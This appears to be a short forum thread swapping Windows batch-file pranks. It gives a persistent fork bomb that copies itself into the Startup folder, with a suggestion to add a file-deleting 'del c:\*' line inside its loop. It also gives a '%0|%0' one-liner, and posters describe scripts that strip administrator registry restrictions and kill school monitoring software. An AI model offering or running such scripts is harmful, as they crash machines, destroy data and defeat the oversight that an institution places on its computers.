Did you add a command script?
@echo off
copy "%0" "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
:s
start "%0"
goto s
This continuously creates instances of cmd.exe until your computer crashes, and then runs on startup as well as wasting loads of disk space. For extra violence, place the second command inside the loop.
del c:\*
Yeah I just seen it over my moms phone.
I really don't trust that one.
%0|%0 is always fun.
At school, some friends and I love to hold down Ctrl-Shift-Esc to spam the message box "Task Manager has been disabled by your administrator" on each other's computers. But i created a batch file that closes all of them at once.
I have a batch file that deletes many registry keys that disable useful functions (right-clicking, task manager, cmd, run, etc.)
I also have one that kills the spying program (for me it is NetSupport) that I compiled into a .exe.